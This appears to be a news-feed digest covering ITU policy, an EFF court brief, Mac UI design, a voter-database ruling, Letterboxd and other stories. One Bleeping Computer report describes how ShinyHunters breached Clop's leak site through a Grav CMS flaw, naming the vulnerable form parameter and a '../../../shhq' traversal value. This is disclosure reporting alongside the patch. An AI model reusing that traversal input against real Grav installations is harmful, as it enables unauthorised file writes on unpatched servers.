Extension Event Session

CiviCRM
civicrm.org
2026-09-25 05:15:32
Based on some of the questions from our customers we at CiviCooP have developed an extension to enable event sessions for events. With this extension you can manage simultaneous sessions within an event and register participants for each session....
Original Article

What's At Stake at ITU PP-26

Internet Exchange
internet.exchangepoint.tech
2026-09-24 10:15:25
A guide for civil society groups that want to shape the ITU’s next four years of work....
Original Article

By Maria Paz Canales and Mallory Knodel

Maria Paz is a member of the UK delegation in a supporting role and Mallory is a member of the US delegation to PP-26. We write here in our personal capacity according to our own assessment of the civil society engagement.

The International Telecommunication Union (ITU) is a specialized agency of the United Nations that works on international telecommunications development, and the Plenipotentiary Conference (PP or Plenipot) is its highest policymaking body, convened once every four years. ITU PP-26 will be held in Doha, Qatar in November. There, only ITU member states will negotiate the text of new resolutions and changes to existing ones. Civil society and the technical community are able to attend, but only as observer members or as individual experts on state delegations.

ITU is a multilateral space where only governments make decisions, so non-governamental stakeholders need to invest a lot of time and resources to follow the ITU’s work in its 3 sectors: Radiocommunications, Technical Standards and Development . Because taking part is hard, the Plenipot is a particularly important chance for non-governmental stakeholders to help shape the  ITU’s work for the next 4 year cycle.

Why civil society needs to engage in PP-26

The Plenipotentiary Conference is the most important event in the ITU’s calendar and takes place every four years. It is a three week long conference open to all 193 member states of the ITU. While the ITU does offer sector and associate membership to businesses in the ICT industry, international and regional organisations (including NGOs) and academic institutions, being a sector member or associate only allows you to attend Plenipot , not to speak or vote. Decisions are therefore made only by the member states, and on the basis of consensus (except for elections, which take place via a secret ballot).

There are different committees in charge of discussing issues ranging from budget and internal ITU operation, ITU procedures to policy issues. Inside the committees smaller ad hoc groups work in the resolutions bringing the agreed text to the committees and plenary sessions at which all member states participate. The decisions adopted at Plenipot in policy issues are reflected in resolutions that set the scope of work for ITU in the following 4 year cycle. The resolutions are reviewed in advance of the Plenipot by the regional groups and finalized during the Plenipot.

Being in the room matters. On the ground negotiations on ITU resolutions can help make sure that topics relating to internet governance, artificial intelligence, and cybersecurity are appropriately defined within the ITU study mandate (the official list of topics the ITU is allowed to work on) and don't overlap with the mandates of other forums where governments, companies and civil society make decisions together. They can also brief delegations, track how text evolves across resolution drafts and flag proposals that would take the ITU beyond its remit.

For the upcoming Plenipot, there are several policy focuses for non-governamental stakeholders, but also an overarching concern that many groups have less capacity to take part in the process given tight resources. There is also an open question about how the ITU will live up to its role as one of the UN agencies implementing the WSIS outcomes, including the commitment to multistakeholder governance reflected in the WSIS+20 review outcome resolution.

An engagement agenda for civil society at PP-26

1) Internet governance and human rights

Internet-related issues include internet governance, and the preservation of an open and interoperable internet. The ITU’s mandate is limited when it comes to internet governance, since it principally deals with the telecommunication infrastructures that make the internet possible. However, the ITU plays an important role when it comes to WSIS implementation and addressing the remaining connectivity gaps. Non-governmental stakeholders will watch for any proposals that could extend the ITU’s mandate into open internet standards, DNS administration or internet governance processes that fall outside of ITU’s work. A number of emerging technology and governance questions are increasingly being considered within ITU Study Groups and Focus Groups adding pressure to this expansion — particularly linked to AI-native networks, trust and identity, and smart sustainable cities. This raises questions about institutional scope and implies that the appropriate venue for particular issues may become increasingly contentious at PP-26.

Human rights organizations including the Office of the High Commissioner for Human Rights have been pushing for more inclusion of issues in the ITU-T. One persuasive reason is that the rest of the internet is governed in a multistakeholder way, which allows for oversight and human rights considerations in standards and policies. Furthermore the inclusion of gender in ITU resolutions was a point of contention in PP-24 between Russia and Western states. It is likely that this issue will come up again at PP-26 from Europe and other supportive states to push the ITU to explicitly address how digital divides amplify gender inequalities.

At the same time we do hope to see proactive suggestions on the ways in which the ITU could be more accessible and transparent to more stakeholders. If the ITU’s multilateral working methods were to be extended, we would see the ITU as a standards and treaty forum that aligns better with the multistakeholder methods of the wider internet governance community. Changes to working methods resolutions at the ITU-PP have the opportunity to enable more civil society participation, participation from the Global South, and especially human rights organizations.

2) Services versus networks

The implications of the economic relationship between internet content and application providers (such as streaming and social media companies) and telecommunications operators is at the heart of the debate about “cost-sharing”. Regional group discussions show that this is a live and contentious issue, including traffic-routing and cost-sharing proposals. Diverging perspectives concerning who should bear the costs of network investment and traffic delivery could have significant consequences for the internet ecosystem. The way in which the issue is addressed in the standardization process could affect internet interconnection, particularly for smaller operators and users in developing countries.

3) AI

Emerging technologies are a high priority focus at PP-26, and regional approaches differ in terms of how expansive the ITU’s AI work should go. One thing is clear: AI is a cross cutting issue across many areas in the plenary and working parties and groups such as cybersecurity, smart cities and networks. The formal debate centers on Resolution 214 , the ITU's AI resolution, which is likely to be discussed at the conference itself rather than fought over in the Study Groups. The PP is a high-level opportunity that could help set a more streamlined agenda for the ITU overall, leaving behind legacy work in several areas in an effort to refocus around emerging technology opportunities.

Much of the real activity is happening through Focus Groups (short-term groups set up to develop specifications quickly), where new topics can enter the ITU's work without a wider debate about whether they belong there. Recent examples cover embodied AI, AI-native telecommunication networks, trust and digital identity for humans and AI agents, and AI for smart cities. Non-governmental stakeholders will be watching how PP-26 sets the technical agenda that could affect the scope of these groups, especially where it touches on identity, security and human rights, or duplicates work in other standards bodies and UN processes.

In addition to the unscientific term “Embodied AI,” we are likely to see an uptick in the use of “superintelligence,” (SI) in addition to AI.

4) Post-quantum

Quantum technologies are also a focus, raising specific security concerns, such as the risk that future quantum computers could break the encryption used to protect communications today. Cybersecurity and network resolutions are implicated in any introduction of post-quantum cryptography into the ITU’s mandate. What is at stake when thinking about ITU’s role related to specific technologies like these is not simply technological development, but the institutional consequences of incorporating particular technological approaches into international telecommunications frameworks, as well as how the ITU’s standardization work fits with the work of other technical bodies and UN processes.

5) Connectivity and access to the internet

Low Earth orbit (LEO) satellite constellation governance, submarine cable resilience and spectrum policy all present regulatory challenges that affect efforts to close remaining connectivity gaps. In regional discussions, these concerns are linked with network development and cost-sharing because both ultimately address the conditions under which connectivity can be expanded, maintained and made resilient. New resolutions on space-enabled connectivity might ensure more equity in the costs to deploy spatial connectivity infrastructure and better coordination on spatial data sharing to mitigate collisions in space.

There are also concerns about internet resilience from undersea cables to infrastructure investments on land to constellations in the sky.

The challenge is to find the policies and technical designs that support a diverse range of connectivity models without creating regulatory fragmentation or imposing costs that disproportionately affect less-resourced markets.

6) Cybersecurity

The ITU’s work on cybersecurity capacity building is a good complement to UN cybersecurity processes and existing technical community and civil society efforts, and the ITU could benefit from working more closely with these broader stakeholders. The ITU’s cybersecurity work is anchored in Resolution 130 . Negotiating this resolution has proven difficult in the past, with some advocating for the expansion of the ITU to take on a more operational or coordinating role. However, the ITU’s work to improve the cyber resilience of member countries, particularly developing countries, enjoys wide support.

Civil society has raised alarm bells of the broader UN’s Cybercrime Treaty, because it creates overbroad mechanisms for international cooperation without adequate human rights guardrails. It is possible that interoperability mechanisms to implement the Treaty show up at the ITU-PP in cybersecurity or ITU working methods resolutions.

Emerging technologies such as quantum computing and AI are making cybersecurity threats more complex, and are likely to come up in negotiations on potential amendments to the cybersecurity resolution at Plenipot. AI affects cybersecurity in more than one way: its ability  to process and analyse vast amounts of data can either exacerbate vulnerabilities in cyberspace, or be harnessed to enhance cybersecurity, resilience, and peace and security. There are already multiple separate UN forums and processes for discussing this (including the Global Dialogue on AI Governance, and the Global Mechanism on developments in the field of ICTs in the context of international security and advancing responsible State behaviour in the use of ICTs), which would make expanding the ITU’s work into this area complex and most likely duplicative.

7) Child Online Protection

Across many jurisdictions, evidence of harm to young people coming from online engagement has sparked pressure to introduce age-based restrictions and age assurance requirements in digital interactions. Major regulatory developments are emerging, putting pressure on technical experts and industry to standardize operations. Poorly designed or implemented measures can restrict children's and adults' freedom of expression, privacy and access to information, create new surveillance risks, or impose requirements with serious technical and privacy implications. The ITU-T Study Group 17 (SG17) Correspondence Group on Child Online Protection (CG-COP) has been working to identify gaps in child online protection (COP) standardization within SG17 and other major standardization bodies. This topic is likely to receive renewed attention at this year’s Plenipot, so it will be worth monitoring how the ITU follows up on demands for online child safety, whether through this group or another mechanism, and whether that work stays connected to standardization work in other technical bodies rather than duplicating it.

What this means for civil society

Across all of these areas, the common thread is the scope of the ITU's mandate. The topics that non-governmental stakeholders will be looking to influence are those that present the most clear implications for internet architecture, governance, interoperability and the application of the multistakeholder model. There is also interest in how human rights will be considered in the ITU’s standardization processes happening in the new cycle of work, considering the tensions among member states that have surfaced in the most recent cycle when the topic has been brought to attention. Taken together, these topics give a broad picture of the issues likely to be among the more sensitive discussions at PP-26. For groups with limited capacity, the most useful contributions will be the ones described earlier: briefing delegations, tracking how text evolves across drafts and flagging proposals that would take the ITU beyond its remit.


EFFecting Change: How to Build a Decentralized Web That Truly Works for All

IX and Social Web Foundation's Mallory Knodel joined an EFF panel with Babette Ngene and public interest technologist Bruce Schneier on what the Fediverse can and cannot offer users. Instead of asking whether it can replace today's dominant platforms, the panel tackles a bigger question: what would it take to give people and communities real choices over their data and how their online spaces are governed?

Want to appear here? Sponsor a newsletter.

Add yourself to the group chat 📲

If you find our emails useful, become a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.

Not ready for a long-term commitment? You can always leave us a tip .

Become A Paid Subscriber

🚨

Stop press! Do you enjoy our links? Links are now available to paid subscribers only. Become a paid subscriber today.

EFF to Court: Trump's Use of Truth Social's Pay-To-See-Posts-First Scheme Violates Americans' 1st Amendment Equal Access Rights

Electronic Frontier Foundation
www.eff.org
2026-09-25 17:04:11
EFF legal intern Simar Kaur also contributed to this article. Americans’ First Amendment right to equal access to official government statements is violated by the Trump administration’s use of Truth Social’s preferential treatment scheme, which blocks people who won’t pay Trump’s company up to $100...
Original Article

EFF legal intern Simar Kaur also contributed to this article.

Americans’ First Amendment right to equal access to official government statements is violated by the Trump administration’s use of Truth Social’s preferential treatment scheme, which blocks people who won’t pay Trump’s company up to $100,000 a month early access to government news, EFF told a federal court. The First Amendment guarantees that members of the public have equal access to public officials’ public comments, we reminded the court. EFF filed an amicus brief in support of a motion for a preliminary injunction in the lawsuit filed by The Intercept Media and the Freedom of the Press Foundation against President Trump and other administration officials. The lawsuit challenges their use of Truth Social as their primary social media method of making official announcements when that platform provides people who pay a fee for early access to such posts. Trump uses his Truth Social account as his primary means of communicating with the public, including to announce military operations and ceasefires, foreign and domestic policy, and the removal and appointment of heads of federal agencies. Earlier in the year, Trump Media, which owns Truth Social, announced “Truth API,” a service that provides investors early access to “market-moving” messages from the president and other high-ranking officials for a fee of up to $100,000 per month. The plaintiffs, the Freedom of the Press Foundation and The Intercept, contend that the president and other officials’ preferred use of Truth Social with this service violates the First and Fifth Amendments of the Constitution. The plaintiffs are asking the court to immediately prevent the president from posting on Truth Social in a manner that allows him to profit from selling early access to government information. EFF’s amicus makes two main points. First, the brief establishes that social media is pervasively used by government officials and agencies as a medium for official communication with the public, including to disseminate critical public safety information and make official announcements. Second, the brief explains that the challenged practice violates the First Amendment, which guarantees a right to access public officials’ public comments on equal terms with other members of the press and public. Giving some people preferential access must at a minimum be reasonably justified to satisfy First Amendment scrutiny, a test the administration does not meet. Lining the president and his company's pockets is not a legitimate government interest for restricting timely access to the government's statements. Further, the fact that the public could ultimately access the information from other, less direct channels does not eliminate the need for First Amendment scrutiny; mere delays in timely access still trigger First Amendment scrutiny. EFF has been advancing the First Amendment right of equal access to government’s public social media posts since at least 2018 . We’ve argued that the right of equal access, which is well established in offline contexts, must apply to official government social media posts as well. This case presents an excellent opportunity for a court to directly adopt that position.

Related Issues

Related Updates

The Intercept Media, Inc. and Freedom of the Press Foundation v. Trump et al

The lawsuit argues that the paid service restricts access to public information, violating the First Amendment rights of speech, press and association. It argues the service: 1. Places an unconstitutional burden on the right of access to public information 2. Places an unlawful time, place or manner restriction on access...

Court Rules Against Citizen Journalists in DMCA Takedown Case—EFF Will Appeal

A federal court in Massachusetts has ruled that copyright holders can issue online takedown notices based on a subjective belief of copyright infringement, even when that belief is unreasonable and self-serving. The case was brought by our client, Channel 781 News, after takedown notices temporarily shut down the citizen journalism...

A List of ICE Subpoenas to Tech Companies

This is likely an undercount. The full scope is hard to pin down because these subpoenas typically only come to light when a user is given notice and challenges them in court, or when a company documents them in a transparency report.

EFF Statement on Meta Settlement

The settlement enshrines Meta's harmful surveillance into law, and it will compromise users' privacy and anonymity while increasing their exposure to data breaches and government data requests.

ShinyHunters hacked Clop leak site using Grav CMS path traversal flaw

Bleeping Computer
www.bleepingcomputer.com
2026-09-25 16:57:55
The Clop ransomware gang has moved its data leak site to a new Tor address after confirming its previous server was compromised and defaced through an unpatched Grav CMS flaw that BleepingComputer has learned is an unauthenticated path traversal vulnerability. [...]...
Original Article

Hacker holding a cube

The Clop ransomware gang has moved its data leak site to a new Tor address after confirming its previous server was compromised and defaced through an unpatched Grav CMS flaw that BleepingComputer has learned is an unauthenticated path traversal vulnerability.

The Clop leak site was breached earlier this month by the ShinyHunters extortion gang, which first uploaded a small text file and later replaced the site with a full-page defacement displaying its Umbreon Pokémon logo and a link to its own data leak site.

Clop data leak site defaced by ShinyHunters
Clop data leak site defaced by ShinyHunters

ShinyHunters later claimed on its own data leak site that it stole source code, Grav CMS plugins, server logs, and the private keys used by Clop's Tor onion service. The group then issued a ransom demand, threatening to leak the stolen files if Clop did not pay.

Clop has now announced a new onion address and says the old domain will remain accessible temporarily before being retired.

Clop also denied having any relationship or ongoing negotiations with ShinyHunters.

"We do not know them, we have never worked with them, and at the moment we are not in contact with them; furthermore, we have not provided them with any information, nor will we do so—either now or in the future," Clop told BleepingComputer.

When asked whether the group had determined how ShinyHunters breached the leak site, Clop confirmed that its Grav installation had not been fully updated.

However, the Russian ransomware gang disputes ShinyHunters' claims that valuable operational or financial data was stolen from the compromised server.

"We didn't update the Grav plugin — though it happened eventually—but the server contained nothing but content (meaning there was absolutely no data or financial activity there, nor could there have been). Therefore, their claim is worthless—as are their words," Clop said.

While Clop says they are not communicating with the other threat actors, they have since been quietly removed from ShinyHunters' data leak site, which commonly happens when negotiations are taking place.

When questioned about the removal, ShinyHunters told BleepingComputer that they did not want to answer any further questions about this.

Grav confirms flaw used in attack

Grav CMS has now confirmed that the vulnerability and exploitation details shared by ShinyHunters with BleepingComputer are accurate.

ShinyHunters told BleepingComputer that the compromised Clop server was running Grav CMS 1.7.43 and claimed it exploited an unauthenticated file upload flaw in Grav's form upload handling.

According to the threat actor, the vulnerable code used values supplied through form-related POST parameters when creating temporary upload directories without first validating them as safe filesystem path components.

The group specifically identified the __unique_form_id__ parameter and said the value was added into a temporary path like:

tmp/forms/<session_id>/<unique_id>

ShinyHunters claimed that by supplying directory traversal sequences, such as ../../../shhq , for the unique form identifier, it could cause Grav to create an upload path outside the intended tmp/forms directory.

The uploaded file could then be written elsewhere under the Grav installation.

After BleepingComputer shared the technical details with Grav, the CMS developers confirmed that the threat actor's description was accurate.

"Yes, it's a legitimate flaw, and the threat actor's description is accurate," Grav told BleepingComputer.

Grav said the flaw is tracked as CVE-2026-42608 and is a path traversal vulnerability that was privately reported and fixed in Grav 2.0 (2.0.0-beta.2) earlier this year, with the advisory published on April 27.

The fix added a sanitizeId() function that only accepts identifiers matching the allowlist:

[A-Za-z0-9,_-]{1,64}

Grav confirmed that this sanitization method is the same mitigation described by ShinyHunters to BleepingComputer.

However, while current Grav 2.x releases had already been protected, the fix had not been backported to the older Grav 1.7 branch, leaving installations such as Clop's 1.7.43 deployment vulnerable.

"The gap was the 1.7 line," Grav told BleepingComputer. "Grav 2.0 is the current major version, but plenty of sites are still on 1.7, and that fix hadn't been backported there yet."

After BleepingComputer shared the exploitation details with Grav, the developers backported the fix to the 1.7 branch and released Grav 1.7.53.4 yesterday .

Grav also clarified that the vulnerability is located in Grav core rather than the Form plugin.

"The bug lives in Grav core, not the Form plugin, so the Form plugin version (7.3.0 in their example) doesn't change whether a site is vulnerable. It's the core version that matters," Grav said.

Grav is urging anyone still running the 1.7 branch to upgrade to version 1.7.53.4. Users of current Grav 2.x releases have already been protected from the vulnerability for months.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

AI Love Song for Mistress Played at Murder Trial Is Most Excruciating Watch in Recent Memory

403 Media
www.404media.co
2026-09-25 16:56:21
"One’s like a happy or upbeat sad song if that makes any sense, and one’s a sad, sad song. I think one’s in a minor key, one’s in a major key, but I’m not a music professional."...
Original Article

We debated for a long time about whether to write about the following video, which comes from a murder trial in which a man named Caleb Flynn is accused of killing his wife. The crime is very serious, and very sad, and yet the following video demonstrates something about where we are as a society.

The trial has received national attention and has been streaming live. Toward the end of the proceedings Thursday, the prosecution played two versions of an AI love song that Flynn, a former American Idol contestant, generated for his mistress. Investigators found the AI song files as well as lyrics for the song in Flynn’s Notes app after using the forensic tool GrayKey to break into his phone.

“We found audio files on Caleb’s iPhone that seem to have been AI generated and related to his relationship with [his mistress],” Joseph Wilhelm, a forensic investigator testified. “They’re in two different keys. One’s like a happy or upbeat sad song if that makes any sense, and one’s a sad, sad song. I think one’s in a minor key, one’s in a major key, but I’m not a music professional.”

“Permission to publish, your honor?,” the prosecutor says.

“You may,” the judge says.

What follows feels like it should be from an I Think You Should Leave skit or a Nathan Fielder bit. It is real, however. Everyone in the court spends the next few minutes trying not to laugh during what is, again, a murder trial. It simply must be seen to be believed:

When the songs mercifully end, the court goes silent for several seconds. The judge then says: “We’re going to break for the day. It’s 10 after 4 [p.m.] We will reconvene tomorrow.”

Earlier in the day , Flynn’s mistress was asked to read various text messages he wrote her into the public testimony. “I’ve spent a lot of time on my own and in Cleveland. I finished the lyrics to our song. To your song. Although it may mean nothing to you, I wanted to give them to you. I have the music which is completely different to what you’ve heard to this point and I was going to record it but I know there will be no way I would ever be able to actually sing it again,” Flynn wrote.

“Do you want to hear the song I wrote for you with an AI voiceover,” Flynn also wrote. “I have this software called ElevenLabs where I loaded the song on piano and sent it with my computer microphone to which I can pick an AI voice to sing it better.”

“I don’t know if I’m ready to listen to this yet. I’m sorry,” she responded. “Send me the song and I’ll save it to my phone and I’ll listen when I’m ready, even if it’s a month from now. I don’t want it to be erased.”

“Are you sure? It messed up the outro as it’s supposed to be done and the vocals aren’t exactly how I want it, it was a little rock-ier at times but the melody is correct. I tried to sing it with passion and AI took it and went a little extreme.”

“It’s OK,” she said.

The investigation into the murder is actually 404 Media-relevant for several reasons. The AI-generated songs were found after Wilhelm used both Cellebrite and Graykey to try to break into Wilhelm’s phone.

Ultimately Wilhelm used Graykey’s Magnet tool to unlock and examine Flynn’s phone, which gave him a “full file system extraction.” Wilhelm then obtained Flynn’s messages, the AI audio files, cell phone location history, sleep data from Flynn’s Oura Ring, heart rate data from an Apple Watch, learned that Flynn deleted an app called “AI music song generator” days before the murder, and AirPod connection and disconnection information.

About the author

Jason is a cofounder of 404 Media. He was previously the editor-in-chief of Motherboard. He loves the Freedom of Information Act and surfing.

Jason Koebler

Stock UI in MacOS 27 Eschews Clarity

Daring Fireball
mastodon.design
2026-09-25 16:54:34
“Thibault”, in post on Mastodon responding to Brent Simmons’s “stock Mac UI” post that I just linked to: It reminded me of my own explorations with the macOS design language, especially the modern title/toolbar which I believe is one of the most foundational design regression on the platform. I...

Rising sea destroys homes, erases beaches in California

Hacker News
www.reuters.com
2026-09-25 16:13:23
Comments...
Original Article

Please enable JS and disable any ad blocker

Brent Simmons on ‘Stock’ Mac UI

Daring Fireball
inessential.com
2026-09-25 15:45:44
Brent Simmons: To recap: the reasons for using stock Mac UI are 1) user familiarity, which we’ve known for a while just isn’t a thing, and 2) hoping to be able to expend less developer effort, which we’ve seen can work against you. But there’s another reason: the stock Mac UI is designed by App...
Original Article

The latest macOS is a nice step toward a good-looking Mac UI, but I do wish it had gone farther.

I am in particular not a fan of how Mac toolbars look. I don’t like the full-height sidebars and I especially don’t like the Liquid Glass buttons.

I looked around at what other Mac apps are doing. I asked on my microblog which gets syndicated to Mastodon and I also looked at replies to Isaiah’s similar question from a few days ago.

What I found should be no surprise: many of the apps people think look good are not using stock UI.

You already know this. I don’t think I need to prove it. But one app may serve as an illustration: Things .

Things is a perennial callout for its design and for its Mac-like-ness. But it is not really a stock Mac app at all. The toolbar is not at the top of the window (not an NSToolbar) and it’s not customizable. There is no hint of Liquid Glass style translucency anywhere in their main UI. The content doesn’t slide under the sidebar, for instance. (The one place I can find anything obviously Liquid Glass is the toolbar buttons in the settings window.)

I’ve long been a devoted proponent of using stock Mac UI for, I always thought, good reasons: users are already familiar with that UI and it’s less work to create and update every year.

Plot twist

I think those reasons (user familiarity and developer effort) may not stand up entirely. At least not these days.

Users have shown — again, I don’t need to prove this — that they don’t think about a stock Mac app vs. custom. Do they dislike Things for not having a toolbar at the top of the window that they can customize in the usual way? No. (The only people who think that way are longtime Mac developers like me.)

Are users able to understand the UI to popular Mac apps — to Things, Slack, Craft, OmniFocus, NotePlan, Bear, Reeder, Telegram, Acorn, Tapestry, Obsidian, Audio Hijack, etc. — without much trouble, no matter how stock or not-stock they are? Yes.

Do they know when an app is an Electron app? Nope: they don’t even have a concept of Electron apps and they wouldn’t care if you explained it to them. (Why should they?)

Users may be already familiar with stock Mac UI (and maybe not, actually, depending on what apps they use) — but I don’t think that matters at all anymore.

So what about developer effort

The idea was that by using stock Mac UI you the developer would be carried along — you’d get most of the macOS changes every year mostly for free or with not that much work, since you’d kept up every year.

But my app NetNewsWire has a very stock Mac UI, and Liquid Glass adoption last year was a lot of work. Using stock Mac UI didn’t save us much — in fact, we had more work to do compared to the apps with more custom UI.

I’ll go back to Things. I’m not picking on them, to be clear. Quite the opposite! I very much respect their work, even though I have in the past wished it were more Mac-like (again, in the way only a longtime Mac developer would).

Here’s their blog post from a year ago on adopting Liquid Glass . They did some work, for sure, at their usual high level of quality. And I’m not denigrating that. But it looks like a lot less work than we had to do on NetNewsWire.

And that’s my point: the level of developer effort was higher for the stock Mac app.

The secret third reason for using stock Mac UI

To recap: the reasons for using stock Mac UI are 1) user familiarity, which we’ve known for a while just isn’t a thing, and 2) hoping to be able to expend less developer effort, which we’ve seen can work against you.

But there’s another reason: the stock Mac UI is designed by Apple, the best designers in the world, and do you really think you can do better? Really?

The app world is full of people who think they’re better and they’re really, really, really not.

Well, I still think Apple has the best collection of UI designers in the world, but, for whatever reasons, the guidance from above on how the Mac UI should look is missing the mark. I’m not blaming the people doing the work — they’re doing great work with the direction they’re given.

So this — bad direction — is where the secret third reason falls down. And we’re left with no real reason to stick with stock Mac UI (except for wanting approval from longtime Mac people like me, and you really shouldn’t care about that at all).

Messing around last night

With this in mind I wondered how far I could get in removing the parts of Liquid Glass I don’t like in NetNewsWire. Turns out I could get pretty far, though it comes at the expense of using NSToolbar (as predicted).

Note: this stuff is just on a branch. One night of play, not real design or consideration. (But this is code, not mockups.) It’s not about to ship this way. But I’ll share anyway, because it does hint at some possible ideas for NetNewsWire’s future.

Click the small version to get the big version.

(Note that the column view in the second screenshot is going to ship in 7.2. That part’s already done, and it has nothing to do with Liquid-Glass-or-not. Also note: the article theme in use is part of the standard NetNewsWire app right now, not a new thing.)

The obvious first best thing I could do to improve this is to add some color to the toolbar icons and spread them out better. Maybe add some ability to customize, even though it’s not a standard Mac toolbar.

Of course you might look at this and think “Blech! Looks so old! Spare me!” Totally fair!

But it felt cute. Might delete later

Supreme Court permits states to use SAVE database for citizenship checks

Hacker News
cyberscoop.com
2026-09-25 15:28:30
Comments...
Original Article

The U.S. Supreme Court ruled Friday that states may use the federal SAVE database to verify voter citizenship, reversing lower court decisions that found the database was inaccurate and would likely disenfranchise eligible voters.

In its opinion , the majority wrote that “the Federal Government has an obligation to respond to requests from state and local election officials seeking to verify the citizenship of voters.”

“The District Court’s order thus inhibits the Federal Government’s efforts to assist state and local agencies in the proper administration of the midterm elections, the ruling reads. “Under these circumstances, the equities weigh in favor of a stay.”

The Department of Homeland Security initially designed the SAVE database to determine benefit eligibility for immigrants and to track applicants pursuing U.S. citizenship. Under the Trump administration, it had been repurposed to screen voters for citizenship. Critics say the tool is outdated, often inaccurate and poses a significant risk of wrongly removing eligible voters from rolls.

Voting rights groups, including the League of Women Voters and the Electronic Privacy Information Center, filed suit last year. They argued that combining SAVE data with Social Security records violated confidentiality provisions in the Social Security Act, the Privacy Act and the Administrative Procedures Act.

While the ruling permits states to use the database, adoption remains uncertain. Some conservative states have used SAVE previously, saying it has been helpful in maintaining voter rolls. However, most states have resisted the federal government’s efforts to use citizenship verification systems or wrest control of voter registration efforts away from states. The Trump administration has lost 23 federal court cases in attempts to compel states to share additional data.

Election experts said that the ruling’s impact on 2026 is likely to be limited because of federal laws that bar states from making changes to voter registration within 90 days of an election.

“Given that the SAVE system is used purely as a voluntary system to assist states in keeping their voter lists accurate, states may find this to be a helpful tool to use alongside other mechanisms to keep their lists up to date, even as the Department of Homeland Security itself admits the data is not perfect and evidence suggests the SAVE system has significant flaws,” said David Becker, executive director of the nonprofit Center for Election Innovation and Research.

Three justices – Ketanji Brown Jackson, Sonia Sotomayor and Elena Kagan – dissented, noting that “without full briefing or oral argument, this Court now grants [a stay]—rendering questionable interim rulings about two statutory provisions it has never before interpreted.”

There are laws and procedures that govern how and when federal systems are changed or modified. In this case, DHS did not create a legally mandated system of records notice (SORN) for the SAVE database outlining the broader impacts of the changes on data privacy. Nor did they engage in or offer a public comment period. Instead, they simply announced in May 2025 that the database was ready for use.

In court, the administration cited the Illegal Immigration Reform and Immigrant Responsibility Act to justify merging DHS and Social Security data. That argument was rejected by lower courts, and dissenters argued that the Supreme Court majority overturned those rulings without deliberation about whether the administration’s legal reasoning was sound.

“The majority thus treats [the Illegal Immigration Reform and Immigrant Responsibility Act] as essentially overriding the limits that privacy laws impose on the sharing of citizenship information with DHS. But that ‘back-of-the-napkin assessment,’ is implausible,” wrote Jackson.

Bug: Border radius has infected VSCode editor

Hacker News
github.com
2026-09-25 15:27:37
Comments...
Original Article

Does this issue occur when all extensions are disabled?: Yes/No
Yes

  • VS Code Version: 1.139.0 (Universal)
  • OS Version: 26.5.1 (25F80)

Steps to Reproduce:

  1. Open VSCode
  2. Your editor is now infected with border radius

The VSCode editor has been infected with border radius. The text editor, the file explorer, terminal and copilot chat all have a horrendous case of border radius. I can no long work efficiently with these redundant curves attracting my attention. I thought my desktop apps were safe from this scourge of border radius infecting web. The plague of border radius has spread to my code editor.

Please help!

Letterboxd Is Up for Sale, and A24, Sony and the New York Times Are Bidding

Hacker News
www.worldofreel.com
2026-09-25 15:26:10
Comments...
Original Article

Letterboxd, the app where film Twitter went to live, could soon have a new owner. According to a new report , The New York Times, A24, and Sony Pictures are among the suitors who've expressed interest in buying the site.

The asking price? More than $300M, per the Times' sources. That's roughly 20 times the approximately $15M Letterboxd is projected to earn this year. Not bad for a site started in 2011 by two New Zealand designers, Matthew Buchanan and Karl von Randow, who were annoyed that movie lovers had nowhere decent to gather online.

The growth is honestly staggering. The site now has 30 million users, up from 1.8 million in 2020. Most people use it for free, but there are paid Pro ($19/year) and Patron ($49/year) tiers, plus ad revenue. Media analyst Ken Doctor summed up the appeal to the Times: an engaged audience that pays and that advertisers want to reach is "the gold standard of the internet."

My two cents: A24 buying Letterboxd would be the most on-brand acquisition imaginable, but also the messiest. Its movies get rated on the platform every single day, and the conflict-of-interest questions write themselves. Same goes for Sony. The Times makes the most sense on paper, but it has its own critics.

The Backlash to “NAZA” Shows How Little Israeli Citizenship Really Means

Intercept
theintercept.com
2026-09-25 14:25:41
By threatening the filmmakers, Netanyahu lays bare how fragile the notion of what it means to be Israeli is in the age of its genocide in Gaza. The post The Backlash to “NAZA” Shows How Little Israeli Citizenship Really Means appeared first on The Intercept....
Original Article
ASHDOD, ISRAEL - SEPTEMBER 16: A graffiti mural depicting Israeli filmmakers Yuval Abraham and Rachel Szor, directors of the documentary 'NAZA'- which documents civilian deaths in Gaza, features testimonies from Israeli military personnel involved in targeting and remote killing mechanisms, and frame military operations as genocide - is altered in Ashdod, Israel, on September 16, 2026. Initially painted by an artist accusing the filmmakers of being 'traitors,' the text on the mural was subsequently modified by another artist to read 'heroes.' (Photo by Mostafa Alkharouf/Anadolu via Getty Images)
A graffiti mural depicting Israeli filmmakers Yuval Abraham and Rachel Szor, directors of the documentary “NAZA,” seen in Ashdod, Israel, on Sept. 16, 2026. Initially painted by an artist accusing the filmmakers of being “traitors,” the text on the mural was subsequently modified by another artist to read “heroes.” Photo: Mostafa Alkharouf/Anadolu via Getty Images

The Israeli documentary “NAZA” will make its North American premiere tomorrow at the New York Film Festival on the heels of Israeli Prime Minister Benjamin Netanyahu’s vitriolic speech at the United Nations, which was met by mass protests, arrests , and diplomats walking out. Other Israeli documentaries have screened at Lincoln Center, including one at the New York Jewish Film Festival in January on the movement for LGBTQ+ rights or another about an October 7 hostage. But this film, co-directed by Yuval Abraham and Rachel Szor, has proven extraordinarily controversial in its home country, reviled by nearly every sector of media and politics.

The documentary, which is composed of anonymous interviews with those active in Israel’s military and intelligence service during the war against Gaza, depicts extensive, highly detailed confessions of their participation in the mass targeting and killing of Palestinian civilians. The film’s title comes from the Israeli military’s system for assessing collateral damage, an interface that one of the anonymous confessors says can map out every building in the Gaza Strip and predict what civilians may be killed in an airstrike. One man who used the NAZA interface remarks in a clip from the film that the military once approved a single strike the system calculated would kill 500 Palestinians, and said the system makes no distinction between adults and children.

